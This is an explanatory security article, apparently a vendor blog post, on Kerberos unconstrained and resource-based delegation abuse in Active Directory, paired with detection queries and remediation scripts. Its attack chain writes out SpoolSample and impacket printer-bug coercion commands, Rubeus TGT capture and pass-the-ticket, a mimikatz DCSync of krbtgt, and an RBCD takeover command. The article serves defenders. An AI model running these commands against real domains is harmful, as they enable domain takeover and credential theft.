What Is Kerberos Delegation?
Kerberos delegation allows a service to authenticate to other services on behalf of a user. It is a legitimate feature designed for multi-tier applications: a web server needs to access a database as the authenticated user, so Kerberos allows the web server to impersonate that user when connecting to the database.
There are three types of Kerberos delegation, each with very different security implications:
- Unconstrained Delegation โ the service can impersonate any user to any service in the domain
- Constrained Delegation โ the service can only impersonate users to specific, predefined services
- Resource-Based Constrained Delegation (RBCD) โ the target resource controls who can delegate to it
Unconstrained delegation is the most dangerous configuration in Active Directory after a Golden Ticket. It is trivially exploitable and leads directly to Domain Admin.
How It Works
When a user authenticates to a service configured for unconstrained delegation, the KDC includes a copy of the user's full TGT in the service ticket. The service receives this TGT and can use it to authenticate as the user to any other service in the domain.
This means: if an attacker compromises a machine or service configured for unconstrained delegation, and can trick a Domain Controller into authenticating to it, they capture the DC's TGT. A DC's TGT grants Domain Admin-level access and can be used to perform a Golden Ticket attack.
The technique to trigger DC authentication is called printer bug or SpoolSample โ a Windows print spooler feature that causes machines to authenticate back to a specified target.
The Attack Chain
Step 1 - Find Computers With Unconstrained Delegation
# Find all computers (excluding DCs) with unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, TrustedToAuthForDelegation |
Where-Object {$_.Name -notlike "*DC*"} |
Select-Object Name, TrustedForDelegation
Step 2 - Compromise the Delegated Machine
The attacker compromises the machine with unconstrained delegation (via local admin access, Kerberoasting a service on it, or any other method). They now control a machine that collects TGTs.
Step 3 - Coerce DC Authentication (Printer Bug)
# SpoolSample โ coerce the DC to authenticate to the attacker's machine
SpoolSample.exe DC01.corp.local COMPROMISED-SERVER.corp.local
# Or using impacket
impacket-printerbug -u user -p password corp.local/DC01 COMPROMISED-SERVER
Step 4 - Capture the DC TGT and Escalate
# On the compromised machine โ capture the DC's TGT from memory
Rubeus.exe monitor /interval:5 /filteruser:DC01$
# Once captured, use the TGT for DCSync
Rubeus.exe ptt /ticket:doIFXDCCBVig...
lsadump::dcsync /domain:corp.local /user:krbtgt
RBCD Abuse (Constrained Delegation Variant)
Resource-Based Constrained Delegation can be abused if an attacker has GenericWrite over a computer object โ allowing them to configure delegation and escalate without unconstrained delegation:
# Set RBCD โ attacker adds their controlled computer to target's msDS-AllowedToActOnBehalfOfOtherIdentity
Set-ADComputer -Identity TARGET-PC -PrincipalsAllowedToDelegateToAccount ATTACKER-PC$
Detection
Windows Event IDs
| Event ID | Source | What to Look For |
|---|---|---|
| 4769 | DC - Security | Service ticket requested for DC account from unexpected source |
| 4624 | Delegated server | Network logon (Type 3) from DC machine account โ suspicious if coerced |
| 5145 | Target server | Network share accessed โ spoolss pipe access from DC coerce |
Behavioral Anomalies
- DC machine account authenticating to non-DC servers โ strong indicator of printer bug coercion
- TGT forwardable flag on tickets from non-DC sources
- Rubeus or Mimikatz artifacts in memory on delegation-configured servers
SIEM Detection Query (Elastic KQL)
event.code: "4769" AND
winlog.event_data.ServiceName: "*$" AND
winlog.event_data.TicketOptions: "0x40810010" AND
winlog.event_data.TargetUserName: (*DC* OR *DOMCON*)
๐ก Tip: Disable the Print Spooler service on all Domain Controllers. It is not needed on DCs and its removal eliminates the primary coercion vector for unconstrained delegation attacks.
Remediation
โ ๏ธ Critical: Unconstrained delegation on any server other than Domain Controllers is a critical misconfiguration. Replace with constrained delegation or RBCD immediately.
1. Remove Unconstrained Delegation
# Disable unconstrained delegation on all non-DC computers
Get-ADComputer -Filter {TrustedForDelegation -eq $true} |
Where-Object {$_.Name -notlike "*DC*"} | ForEach-Object {
Set-ADComputer -Identity $_ -TrustedForDelegation $false
Write-Host "Fixed: $($_.Name)"
}
2. Replace With Constrained Delegation
# Configure constrained delegation to specific SPNs only
Set-ADComputer -Identity WebServer -Add @{
"msDS-AllowedToDelegateTo" = @("MSSQLSvc/sqlserver.corp.local:1433")
}
Set-ADAccountControl -Identity WebServer$ -TrustedToAuthForDelegation $true
3. Disable Print Spooler on Domain Controllers
# Disable and stop spooler on all DCs
Invoke-Command -ComputerName (Get-ADDomainController -Filter *).Name -ScriptBlock {
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
}
4. Audit RBCD Configurations
# Find computers with RBCD configured (msDS-AllowedToActOnBehalfOfOtherIdentity)
Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity |
Where-Object {$_."msDS-AllowedToActOnBehalfOfOtherIdentity" -ne $null} |
Select-Object Name, @{N="RBCD";E={$_."msDS-AllowedToActOnBehalfOfOtherIdentity"}}
How EtcSec Detects This
EtcSec audits all delegation configurations across every computer and service account in your AD environment.
UNCONSTRAINED_DELEGATION identifies all non-DC computers and service accounts configured with unconstrained delegation โ the most critical delegation misconfiguration, enabling full domain compromise via TGT capture.
CONSTRAINED_DELEGATION flags misconfigured constrained delegation settings, including protocol transition abuse and overly broad service lists.
RBCD_ABUSE detects computers where the msDS-AllowedToActOnBehalfOfOtherIdentity attribute is configured in ways that could enable privilege escalation.
โน๏ธ Note: EtcSec audits all delegation settings automatically in every AD scan. Run a free audit to identify delegation misconfigurations in your environment.
Related articles: Golden Ticket Attack | Kerberoasting
